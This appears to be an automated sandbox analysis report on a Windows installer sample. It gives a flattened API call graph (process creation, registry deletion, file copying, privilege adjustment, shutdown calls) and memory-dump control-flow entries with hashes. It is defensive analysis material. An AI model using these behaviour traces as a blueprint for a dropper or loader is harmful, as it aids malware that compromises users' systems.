7597->7598 7599 4028a4 7598->7599 7601 4028b3 SetFilePointer 7599->7601 7601->7600 7602 4028c3 7601->7602 7604 40649e wsprintfW 7602->7604 7604->7600 8618 401f17 8619 402dab 21 API calls 8618->8619 8620 401f1d 8619->8620 8621 402dab 21 API calls 8620->8621 8622 401f26 8621->8622 8623 402dab 21 API calls 8622->8623 8624 401f2f 8623->8624 8625 402dab 21 API calls 8624->8625 8626 401f38 8625->8626 8627 401423 28 API calls 8626->8627 8628 401f3f 8627->8628 8635 405b7d ShellExecuteExW 8628->8635 8630 401f87 8633 402933 8630->8633 8636 4069f6 WaitForSingleObject 8630->8636 8632 401fa4 CloseHandle 8632->8633 8635->8630 8637 406a10 8636->8637 8638 406a22 GetExitCodeProcess 8637->8638 8639 406987 2 API calls 8637->8639 8638->8632 8640 406a17 WaitForSingleObject 8639->8640 8640->8637 8795 402f98 8796 402fc3 8795->8796 8797 402faa SetTimer 8795->8797 8798 403018 8796->8798 8799 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 8796->8799 8797->8796 8799->8798 8641 40571b 8642 4058c5 8641->8642 8643 40573c GetDlgItem GetDlgItem GetDlgItem 8641->8643 8645 4058ce GetDlgItem CreateThread CloseHandle 8642->8645 8646 4058f6 8642->8646 8686 40450b SendMessageW 8643->8686 8645->8646 8648 405946 8646->8648 8649 40590d ShowWindow ShowWindow 8646->8649 8651 405921 8646->8651 8647 4057ac 8656 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 8647->8656 8655 40453d 8 API calls 8648->8655 8688 40450b SendMessageW 8649->8688 8650 405981 8650->8648 8659 40598f SendMessageW 8650->8659 8651->8650 8653 405935 8651->8653 8654 40595b ShowWindow 8651->8654 8689 4044af 8653->8689 8662 40597b 8654->8662 8663 40596d 8654->8663 8661 405954 8655->8661 8657 405821 8656->8657 8658 405805 SendMessageW SendMessageW 8656->8658 8664 405834 8657->8664 8665 405826 SendMessageW 8657->8665 8658->8657 8659->8661 8666 4059a8 CreatePopupMenu 8659->8666 8668 4044af SendMessageW 8662->8668 8667 4055dc 28 API calls 8663->8667 8670 4044d6 22 API calls 8664->8670 8665->8664 8669 406594 21 API calls 8666->8669 8667->8662 8668->8650 8671 4059b8 AppendMenuW 8669->8671 8672 405844 8670->8672 8673 4059d5 GetWindowRect 8671->8673 8674 4059e8 TrackPopupMenu 8671->8674 8675 405881 GetDlgItem SendMessageW 8672->8675 8676 40584d ShowWindow 8672->8676 8673->8674 8674->8661 8677 405a03 8674->8677 8675->8661 8680 4058a8 SendMessageW SendMessageW 8675->8680 8678 405870 8676->8678 8679 405863 ShowWindow 8676->8679 8681 405a1f SendMessageW 8677->8681 8687 40450b SendMessageW 8678->8687 8679->8678 8680->8661 8681->8681 8682 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8681->8682 8684 405a61 SendMessageW 8682->8684 8684->8684 8685 405a8a GlobalUnlock SetClipboardData CloseClipboard 8684->8685 8685->8661 8686->8647 8687->8675 8688->8651 8690 4044b6 8689->8690 8691 4044bc SendMessageW 8689->8691 8690->8691 8691->8648 7866 401d1c 7867 402d89 21 API calls 7866->7867 7868 401d22 IsWindow 7867->7868 7869 401a25 7868->7869 7870 404d1d 7871 404d49 7870->7871 7872 404d2d 7870->7872 7873 404d7c 7871->7873 7874 404d4f SHGetPathFromIDListW 7871->7874 7881 405b9b GetDlgItemTextW 7872->7881 7876 404d5f 7874->7876 7880 404d66 SendMessageW 7874->7880 7878 40140b 2 API calls 7876->7878 7877 404d3a SendMessageW 7877->7871 7878->7880 7880->7873 7881->7877 7605 40149e 7606 4023a2 7605->7606 7607 4014ac PostQuitMessage 7605->7607 7607->7606 8800 401ba0 8801 401bf1 8800->8801 8802 401bad 8800->8802 8803 401bf6 8801->8803 8804 401c1b GlobalAlloc 8801->8804 8805 401c36 8802->8805 8810 401bc4 8802->8810 8812 4023a2 8803->8812 8821 406557 lstrcpynW 8803->8821 8807 406594 21 API calls 8804->8807 8806 406594 21 API calls 8805->8806 8805->8812 8808 40239c 8806->8808 8807->8805 8808->8812 8814 405bb7 MessageBoxIndirectW 8808->8814 8819 406557 lstrcpynW 8810->8819 8811 401c08 GlobalFree 8811->8812 8814->8812 8815 401bd3 8820 406557 lstrcpynW 8815->8820 8817 401be2 8822 406557 lstrcpynW 8817->8822 8819->8815 8820->8817 8821->8811 8822->8812 8379 402621 8380 402dab 21 API calls 8379->8380 8381 402628 8380->8381 8384 406047 GetFileAttributesW CreateFileW 8381->8384 8383 402634 8384->8383 8292 4025a3 8293 402deb 21 API calls 8292->8293 8294 4025ad 8293->8294 8295 402d89 21 API calls 8294->8295 8296 4025b6 8295->8296 8297 4025d2 RegEnumKeyW 8296->8297 8298 4025de RegEnumValueW 8296->8298 8300 402933 8296->8300 8299 4025f3 RegCloseKey 8297->8299 8298->8299 8299->8300 8302 4015a8 8303 402dab 21 API calls 8302->8303 8304 4015af SetFileAttributesW 8303->8304 8305 4015c1 8304->8305 8823 401fa9 8824 402dab 21 API calls 8823->8824 8825 401faf 8824->8825 8826 4055dc 28 API calls 8825->8826 8827 401fb9 8826->8827 8828 405b3a 2 API calls 8827->8828 8829 401fbf 8828->8829 8830 4069f6 5 API calls 8829->8830 8833 402933 8829->8833 8835 401fe2 CloseHandle 8829->8835 8832 401fd4 8830->8832 8832->8835 8836 40649e wsprintfW 8832->8836 8835->8833 8836->8835 7429 40202f 7430 402dab 21 API calls 7429->7430 7431 402036 7430->7431 7432 40694b 5 API calls 7431->7432 7433 402045 7432->7433 7434 402061 GlobalAlloc 7433->7434 7437 4020d1 7433->7437 7435 402075 7434->7435 7434->7437 7436 40694b 5 API calls 7435->7436 7438 40207c 7436->7438 7439 40694b 5 API calls 7438->7439 7440 402086 7439->7440 7440->7437 7444 40649e wsprintfW 7440->7444 7442 4020bf 7445 40649e wsprintfW 7442->7445 7444->7442 7445->7437 7882 40252f 7883 402deb 21 API calls 7882->7883 7884 402539 7883->7884 7885 402dab 21 API calls 7884->7885 7886 402542 7885->7886 7887 40254d RegQueryValueExW 7886->7887 7888 402933 7886->7888 7889 402573 RegCloseKey 7887->7889 7890 40256d 7887->7890 7889->7888 7890->7889 7893 40649e wsprintfW 7890->7893 7893->7889 8306 4021af 8307 402dab 21 API calls 8306->8307 8308 4021b6 8307->8308 8309 402dab 21 API calls 8308->8309 8310 4021c0 8309->8310 8311 402dab 21 API calls 8310->8311 8312 4021ca 8311->8312 8313 402dab 21 API calls 8312->8313 8314 4021d4 8313->8314 8315 402dab 21 API calls 8314->8315 8316 4021de 8315->8316 8317 40221d CoCreateInstance 8316->8317 8318 402dab 21 API calls 8316->8318 8321 40223c 8317->8321 8318->8317 8319 401423 28 API calls 8320 4022fb 8319->8320 8321->8319 8321->8320 7894 403532 SetErrorMode GetVersionExW 7895 403586 GetVersionExW 7894->7895 7896 4035be 7894->7896 7895->7896 7897 403615 7896->7897 7898 40694b 5 API calls 7896->7898 7899 4068db 3 API calls 7897->7899 7898->7897 7900 40362b lstrlenA 7899->7900 7900->7897 7901 40363b 7900->7901 7902 40694b 5 API calls 7901->7902 7903 403642 7902->7903 7904 40694b 5 API calls 7903->7904 7905 403649 7904->7905 7906 40694b 5 API calls 7905->7906 7907 403655 #17 OleInitialize SHGetFileInfoW 7906->7907 7981 406557 lstrcpynW 7907->7981 7910 4036a4 GetCommandLineW 7982 406557 lstrcpynW 7910->7982 7912 4036b6 7913 405e53 CharNextW 7912->7913 7914 4036dc CharNextW 7913->7914 7920 4036ee 7914->7920 7915 4037f0 7916 403804 GetTempPathW 7915->7916 7984 403501 7916->7984 7918 40381c 7921 403820 GetWindowsDirectoryW lstrcatW 7918->7921 7922 403876 DeleteFileW 7918->7922 7919 405e53 CharNextW 7919->7920 7920->7915 7920->7919 7927 4037f2 7920->7927 7924 403501 12 API calls 7921->7924 7994 403082 GetTickCount GetModuleFileNameW 7922->7994 7925 40383c 7924->7925 7925->7922 7926 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 7925->7926 7930 403501 12 API calls 7926->7930 7983 406557 lstrcpynW 7927->7983 7928 40388a 7929 403941 7928->7929 7932 403931 7928->7932 7936 405e53 CharNextW 7928->7936 8094 403b4f 7929->8094 7934 40386e 7930->7934 8024 403c29 7932->8024 7934->7922 7934->7929 7951 4038a9 7936->7951 7938 403ab3 7941 403b37 ExitProcess 7938->7941 7942 403abb GetCurrentProcess OpenProcessToken 7938->7942 7939 403a8f 7940 405bb7 MessageBoxIndirectW 7939->7940 7946 403a9d ExitProcess 7940->7946 7947 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 7942->7947 7948 403b07 7942->7948 7943 403907 7949 405f2e 18 API calls 7943->7949 7944 40394a 8080 405b22 7944->8080 7947->7948 7952 40694b 5 API calls 7948->7952 7954 403913 7949->7954 7951->7943 7951->7944 7953 403b0e 7952->7953 7956 403b23 ExitWindowsEx 7953->7956 7959 403b30 7953->7959 7954->7929 8022 406557 lstrcpynW 7954->8022 7956->7941 7956->7959 7958 403969 7969 403981 7958->7969 8084 406557 lstrcpynW 7958->8084 7961 40140b 2 API calls 7959->7961 7961->7941 7962 403926 8023 406557 lstrcpynW 7962->8023 7965 4039a7 wsprintfW 7966 406594 21 API calls 7965->7966 7966->7969 7969->7929 7969->7965 7970 4039e3 GetFileAttributesW 7969->7970 7971 403a1d SetCurrentDirectoryW 7969->7971 7975 405c63 71 API calls 7969->7975 7976 406317 40 API calls 7969->7976 7977 406594 21 API calls 7969->7977 7979 403aa5 CloseHandle 7969->7979 7980 4068b4 2 API calls 7969->7980 8085 405aab CreateDirectoryW 7969->8085 8088 405b05 CreateDirectoryW 7969->8088 8091 405b3a CreateProcessW 7969->8091 7970->7969 7973 4039ef DeleteFileW 7970->7973 7972 406317 40 API calls 7971->7972 7974 403a2c CopyFileW 7972->7974 7973->7969 7974->7929 7974->7969 7975->7969 7976->7969 7977->7969 7979->7929 7980->7969 7981->7910 7982->7912 7983->7916 7985 406805 5 API calls 7984->7985 7986 40350d 7985->7986 7987 403517 7986->7987 7988 405e26 3 API calls 7986->7988 7987->7918 7989 40351f 7988->7989 7990 405b05 2 API calls 7989->7990 7991 403525 7990->7991 8101 406076 7991->8101 8105 406047 GetFileAttributesW CreateFileW 7994->8105 7996 4030c2 8014 4030d2 7996->8014 8106 406557 lstrcpynW 7996->8106 7998 4030e8 7999 405e72 2 API calls 7998->7999 8000 4030ee 7999->8000 8107 406557 lstrcpynW 8000->8107 8002 4030f9 GetFileSize 8003 4031f3 8002->8003 8016 403110 8002->8016 8004 40301e 6 API calls 8003->8004 8005 4031fc 8004->8005 8007 40322c GlobalAlloc 8005->8007 8005->8014 8119 4034ea SetFilePointer 8005->8119 8006 4034d4 ReadFile 8006->8016 8120 4034ea SetFilePointer 8007->8120 8009 40325f 8013 40301e 6 API calls 8009->8013 8011 403215 8015 4034d4 ReadFile 8011->8015 8012 403247 8017 4032b9 35 API calls 8012->8017 8013->8014 8014->7928 8018 403220 8015->8018 8016->8003 8016->8006 8016->8009 8016->8014 8108 40301e 8016->8108 8020 403253 8017->8020 8018->8007 8018->8014 8020->8014 8020->8020 8021 403290 SetFilePointer 8020->8021 8021->8014 8022->7962 8023->7932 8025 40694b 5 API calls 8024->8025 8026 403c3d 8025->8026 8027 403c43 8026->8027 8028 403c55 8026->8028 8125 40649e wsprintfW 8027->8125 8029 406425 3 API calls 8028->8029 8030 403c85 8029->8030 8032 403ca4 lstrcatW 8030->8032 8033 406425 3 API calls 8030->8033 8034 403c53 8032->8034 8033->8032 8126 403eff 8034->8126 8037 405f2e 18 API calls 8038 403cd6 8037->8038 8039 403d6a 8038->8039 8041 406425 3 API calls 8038->8041 8040 405f2e 18 API calls 8039->8040 8042 403d70 8040->8042 8043 403d08 8041->8043 8044 403d80 LoadImageW 8042->8044 8045 406594 21 API calls 8042->8045 8043->8039 8050 403d29 lstrlenW 8043->8050 8053 405e53 CharNextW 8043->8053 8046 403e26 8044->8046 8047 403da7 RegisterClassW 8044->8047 8045->8044 8049 40140b 2 API calls 8046->8049 8048 403ddd SystemParametersInfoW CreateWindowExW 8047->8048 8079 403e30 8047->8079 8048->8046 8055 403e2c 8049->8055 8051 403d37 lstrcmpiW 8050->8051 8052 403d5d 8050->8052 8051->8052 8054 403d47 GetFileAttributesW 8051->8054 8056 405e26 3 API calls 8052->8056 8057 403d26 8053->8057 8058 403d53 8054->8058 8059 403eff 22 API calls 8055->8059 8055->8079 8060 403d63 8056->8060 8057->8050 8058->8052 8061 405e72 2 API calls 8058->8061 8062 403e3d 8059->8062 8134 406557 lstrcpynW 8060->8134 8061->8052 8064 403e49 ShowWindow 8062->8064 8065 403ecc 8062->8065 8067 4068db 3 API calls 8064->8067 8135 4056af OleInitialize 8065->8135 8069 403e61 8067->8069 8068 403ed2 8070 403ed6 8068->8070 8071 403eee 8068->8071 8072 403e6f GetClassInfoW 8069->8072 8074 4068db 3 API calls 8069->8074 8078 40140b 2 API calls 8070->8078 8070->8079 8073 40140b 2 API calls 8071->8073 8075 403e83 GetClassInfoW RegisterClassW 8072->8075 8076 403e99 DialogBoxParamW 8072->8076 8073->8079 8074->8072 8075->8076 8077 40140b 2 API calls 8076->8077 8077->8079 8078->8079 8079->7929 8081 40694b 5 API calls 8080->8081 8082 40394f lstrlenW 8081->8082 8083 406557 lstrcpynW 8082->8083 8083->7958 8084->7969 8086 405af7 8085->8086 8087 405afb GetLastError 8085->8087 8086->7969 8087->8086 8089 405b15 8088->8089 8090 405b19 GetLastError 8088->8090 8089->7969 8090->8089 8092 405b79 8091->8092 8093 405b6d CloseHandle 8091->8093 8092->7969 8093->8092 8095 403b67 8094->8095 8096 403b59 CloseHandle 8094->8096 8146 403b94 8095->8146 8096->8095 8099 405c63 71 API calls 8100 403a82 OleUninitialize 8099->8100 8100->7938 8100->7939 8102 406083 GetTickCount GetTempFileNameW 8101->8102 8103 403530 8102->8103 8104 4060b9 8102->8104 8103->7918 8104->8102 8104->8103 8105->7996 8106->7998 8107->8002 8109 403027 8108->8109 8110 40303f 8108->8110 8111 403030 DestroyWindow 8109->8111 8112 403037 8109->8112 8113 403047 8110->8113 8114 40304f GetTickCount 8110->8114 8111->8112 8112->8016 8121 406987 8113->8121 8116 403080 8114->8116 8117 40305d CreateDialogParamW ShowWindow 8114->8117 8116->8016 8117->8116 8119->8011 8120->8012 8122 4069a4 PeekMessageW 8121->8122 8123 40304d 8122->8123 8124 40699a DispatchMessageW 8122->8124 8123->8016 8124->8122 8125->8034 8127 403f13 8126->8127 8142 40649e wsprintfW 8127->8142 8129 403f84 8143 403fb8 8129->8143 8131 403cb4 8131->8037 8132 403f89 8132->8131 8133 406594 21 API calls 8132->8133 8133->8132 8134->8039 8136 404522 SendMessageW 8135->8136 8138 4056d2 8136->8138 8137 404522 SendMessageW 8139 40570b OleUninitialize 8137->8139 8140 4056f9 8138->8140 8141 401389 2 API calls 8138->8141 8139->8068 8140->8137 8141->8138 8142->8129 8144 406594 21 API calls 8143->8144 8145 403fc6 SetWindowTextW 8144->8145 8145->8132 8147 403ba2 8146->8147 8148 403b6c 8147->8148 8149 403ba7 FreeLibrary GlobalFree 8147->8149 8148->8099 8149->8148 8149->8149 8385 401a35 8386 402dab 21 API calls 8385->8386 8387 401a3e ExpandEnvironmentStringsW 8386->8387 8388 401a52 8387->8388 8390 401a65 8387->8390 8389 401a57 lstrcmpW 8388->8389 8388->8390 8389->8390 8837 4023b7 8838 4023c5 8837->8838 8839 4023bf 8837->8839 8841 4023d3 8838->8841 8842 402dab 21 API calls 8838->8842 8840 402dab 21 API calls 8839->8840 8840->8838 8843 4023e1 8841->8843 8844 402dab 21 API calls 8841->8844 8842->8841 8845 402dab 21 API calls 8843->8845 8844->8843 8846 4023ea WritePrivateProfileStringW 8845->8846 7608 4014b8 7609 4014be 7608->7609 7612 401389 7609->7612 7614 401390 7612->7614 7613 4013fe 7614->7613 7615 4013cb MulDiv SendMessageW 7614->7615 7615->7614 7446 402439 7447 402441 7446->7447 7448 40246c 7446->7448 7457 402deb 7447->7457 7449 402dab 21 API calls 7448->7449 7451 402473 7449->7451 7462 402e69 7451->7462 7454 402dab 21 API calls 7456 402459 RegDeleteValueW RegCloseKey 7454->7456 7455 402480 7456->7455 7458 402dab 21 API calls 7457->7458 7459 402e02 7458->7459 7460 4063c4 RegOpenKeyExW 7459->7460 7461 402448 7460->7461 7461->7454 7461->7455 7463 402e76 7462->7463 7464 402e7d 7462->7464 7463->7455 7464->7463 7466 402eae 7464->7466 7467 4063c4 RegOpenKeyExW 7466->7467 7468 402edc 7467->7468 7469 402eec RegEnumValueW 7468->7469 7476 402f86 7468->7476 7478 402f0f 7468->7478 7470 402f76 RegCloseKey 7469->7470 7469->7478 7470->7476 7471 402f4b RegEnumKeyW 7472 402f54 RegCloseKey 7471->7472 7471->7478 7473 40694b 5 API calls 7472->7473 7474 402f64 7473->7474 7474->7476 7477 402f68 RegDeleteKeyW 7474->7477 7475 402eae 6 API calls 7475->7478 7476->7463 7477->7476 7478->7470 7478->7471 7478->7472 7478->7475 8692 40173a 8693 402dab 21 API calls 8692->8693 8694 401741 SearchPathW 8693->8694 8695 40175c 8694->8695 8150 401d3d 8151 402d89 21 API calls 8150->8151 8152 401d44 8151->8152 8153 402d89 21 API calls 8152->8153 8154 401d50 GetDlgItem 8153->8154 8155 40263d 8154->8155

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 145 1529e0-152a3b 149 152a5d-152aac 145->149 150 152a3d-152a5c 145->150 154 152ac7-152acf 149->154 155 152aae-152ab5 149->155 158 152ad2-152ae6 154->158 156 152ab7-152abc 155->156 157 152abe-152ac5 155->157 156->158 157->158 161 152afc-152b04 158->161 162 152ae8-152aef 158->162 165 152b06-152b0a 161->165 163 152af5-152afa 162->163 164 152af1-152af3 162->164 163->165 164->165 167 152b0c-152b21 165->167 168 152b6a-152b6d 165->168 167->168 175 152b23-152b26 167->175 169 152bb5-152bbb 168->169 170 152b6f-152b84 168->170 172 1536b6 169->172 173 152bc1-152bc3 169->173 170->169 177 152b86-152b8a 170->177 180 1536bb-153c65 172->180 173->172 176 152bc9-152bce 173->176 178 152b45-152b63 call 1502c8 175->178 179 152b28-152b2a 175->179 181 153664-153668 176->181 182 152bd4 176->182 183 152b92-152bb0 call 1502c8 177->183 184 152b8c-152b90 177->184 178->168 179->178 185 152b2c-152b2f 179->185 200 153c69-153ca4 180->200 187 15366f-1536b5 181->187 188 15366a-15366d 181->188 182->181 183->169 184->169 184->183 185->168 190 152b31-152b43 185->190 188->180 188->187 190->168 190->178 200->200 201 153ca6-153cd9 200->201 205 153cdb-153cdd 201->205 206 153cea-153cf2 201->206 207 153ce3-153ce8 205->207 208 153cdf-153ce1 205->208 209 153cf4-153d02 206->209 207->209 208->209 212 153d04-153d06 209->212 213 153d18-153d20 209->213 214 153d0f-153d16 212->214 215 153d08-153d0d 212->215 217 153d23-153d26 213->217 214->217 215->217 218 153d3d-153d41 217->218 219 153d28-153d36 217->219 220 153d43-153d51 218->220 221 153d5a-153d5d 218->221 219->218 225 153d38 219->225 220->221 230 153d53 220->230 223 153d65-153d9a 221->223 224 153d5f-153d63 221->224 232 153dfc-153e01 223->232 224->223 227 153d9c-153db3 224->227 225->218 228 153db5-153db7 227->228 229 153db9-153dc5 227->229 228->232 233 153dc7-153dcd 229->233 234 153dcf-153dd9 229->234 230->221 236 153de1 233->236 234->236 237 153ddb 234->237 239 153de9-153df5 236->239 237->236 239->232
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                                    • API String ID: 0-1317942629
                                                                                                                                                                                    • Opcode ID: 86d88a6ba340fa29c0d52cc55c9ad3ace52488aaa054affe64c9d9fb836b576b
                                                                                                                                                                                    • Instruction ID: 82110c94bc98c65cb6b41642b6b5e68262806edaf8b0ff65e8ccaa5612f7c391
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86d88a6ba340fa29c0d52cc55c9ad3ace52488aaa054affe64c9d9fb836b576b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63325D6684D7D48FCB638B7848E815B7FB16B92205B8945DFC4C78B687DB28C609C362

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 242 155362-155364 243 1553c4-155484 call 1541a0 call 153cc0 242->243 244 155366-1553a0 242->244 256 155486 243->256 257 15548b-1554ac call 155658 243->257 245 1553a7-1553c2 244->245 246 1553a2 244->246 245->243 246->245 256->257 258 1554b2-1554bd 257->258 259 1554c4-1554c8 258->259 260 1554bf 258->260 261 1554cd-1554d4 259->261 262 1554ca-1554cb 259->262 260->259 264 1554d6 261->264 265 1554db-1554e9 261->265 263 1554ec-155530 262->263 269 155596-1555ad 263->269 264->265 265->263 271 155532-155548 269->271 272 1555af-1555d4 269->272 276 155572 271->276 277 15554a-155556 271->277 281 1555d6-1555eb 272->281 282 1555ec 272->282 280 155578-155595 276->280 278 155560-155566 277->278 279 155558-15555e 277->279 283 155570 278->283 279->283 280->269 281->282 283->280
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: 6a46021313cc4854f3c691bbe99847da4a967fc73f3116c80ca84c82e2b01d01
                                                                                                                                                                                    • Instruction ID: a411a81d258509ddb848b9716880991adfd61a2d5edd190469ce788db94a2010
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a46021313cc4854f3c691bbe99847da4a967fc73f3116c80ca84c82e2b01d01
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA91FA74D00618CFDB18CFA9D894A9DBBF2BF89301F14C069D818AB365DB349985CF10

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 288 15c468-15c471 289 15c473-15c488 288->289 290 15c48c-15c498 288->290 289->290 291 15c49f-15c57c call 1541a0 call 153cc0 290->291 292 15c49a 290->292 302 15c583-15c5a4 call 155658 291->302 303 15c57e 291->303 292->291 305 15c5a9-15c5b4 302->305 303->302 306 15c5b6 305->306 307 15c5bb-15c5bf 305->307 306->307 308 15c5c4-15c5cb 307->308 309 15c5c1-15c5c2 307->309 311 15c5d2-15c5e0 308->311 312 15c5cd 308->312 310 15c5e3-15c627 309->310 316 15c68d-15c6a4 310->316 311->310 312->311 318 15c6a6-15c6cb 316->318 319 15c629-15c63f 316->319 325 15c6e3 318->325 326 15c6cd-15c6e2 318->326 323 15c641-15c64d 319->323 324 15c669 319->324 327 15c657-15c65d 323->327 328 15c64f-15c655 323->328 329 15c66f-15c68c 324->329 326->325 330 15c667 327->330 328->330 329->316 330->329
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: fad296ba00a53a3f1118137d94fbe4ac116f4114c373c5b927848c6b66ec9e3c
                                                                                                                                                                                    • Instruction ID: eb2461eed47019ba6dc4d63786c9d1b267a84dde9b8ac37b4310b8076752ff04
                                                                                                                                                                                    • Opcode Fuzzy Hash: fad296ba00a53a3f1118137d94fbe4ac116f4114c373c5b927848c6b66ec9e3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B981F974E00218CFDB18DFA9D894A9DBBF2BF88301F14D069E818AB365DB345985CF50

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 382 15d278-15d2a8 383 15d2af-15d38c call 1541a0 call 153cc0 382->383 384 15d2aa 382->384 394 15d393-15d3b4 call 155658 383->394 395 15d38e 383->395 384->383 397 15d3b9-15d3c4 394->397 395->394 398 15d3c6 397->398 399 15d3cb-15d3cf 397->399 398->399 400 15d3d4-15d3db 399->400 401 15d3d1-15d3d2 399->401 403 15d3e2-15d3f0 400->403 404 15d3dd 400->404 402 15d3f3-15d437 401->402 408 15d49d-15d4b4 402->408 403->402 404->403 410 15d4b6-15d4db 408->410 411 15d439-15d44f 408->411 417 15d4f3 410->417 418 15d4dd-15d4f2 410->418 415 15d451-15d45d 411->415 416 15d479 411->416 419 15d467-15d46d 415->419 420 15d45f-15d465 415->420 421 15d47f-15d49c 416->421 418->417 422 15d477 419->422 420->422 421->408 422->421
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: 5a9f9f489e9abf84fb621de0c3cc2ef1e96be5a0f51f5de8329eb3dba0acbf8f
                                                                                                                                                                                    • Instruction ID: b049971a0703ce12fc6562fabf4d0fbbb030039c74902cde349cbc96f2c6afff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a9f9f489e9abf84fb621de0c3cc2ef1e96be5a0f51f5de8329eb3dba0acbf8f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1181E974E00258CFDB14DFAAD884A9DBBF2BF89301F14C069E818AB365DB349985CF10

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 334 15c19b-15c19d 335 15c19f-15c1a1 334->335 336 15c1b8 334->336 337 15c1bc-15c1c8 335->337 338 15c1a3-15c1b2 335->338 336->337 339 15c1cf-15c2ac call 1541a0 call 153cc0 337->339 340 15c1ca 337->340 338->336 350 15c2b3-15c2d4 call 155658 339->350 351 15c2ae 339->351 340->339 353 15c2d9-15c2e4 350->353 351->350 354 15c2e6 353->354 355 15c2eb-15c2ef 353->355 354->355 356 15c2f4-15c2fb 355->356 357 15c2f1-15c2f2 355->357 359 15c302-15c310 356->359 360 15c2fd 356->360 358 15c313-15c357 357->358 364 15c3bd-15c3d4 358->364 359->358 360->359 366 15c3d6-15c3fb 364->366 367 15c359-15c36f 364->367 374 15c413 366->374 375 15c3fd-15c412 366->375 371 15c371-15c37d 367->371 372 15c399 367->372 376 15c387-15c38d 371->376 377 15c37f-15c385 371->377 373 15c39f-15c3bc 372->373 373->364 375->374 378 15c397 376->378 377->378 378->373
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: de38fab46afa01a90064032ec2b36b5c32f4b616b8f452a9f54597737b1bd219
                                                                                                                                                                                    • Instruction ID: 5f54aa3bc5bc74be8d848589e83b232ab333eda9e9db3939bb56eaf49565fec0
                                                                                                                                                                                    • Opcode Fuzzy Hash: de38fab46afa01a90064032ec2b36b5c32f4b616b8f452a9f54597737b1bd219
                                                                                                                                                                                    • Instruction Fuzzy Hash: B281D874E00218CFDB58DFAAD894A9DBBF2BF89301F14C069E818AB365DB349945CF50

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
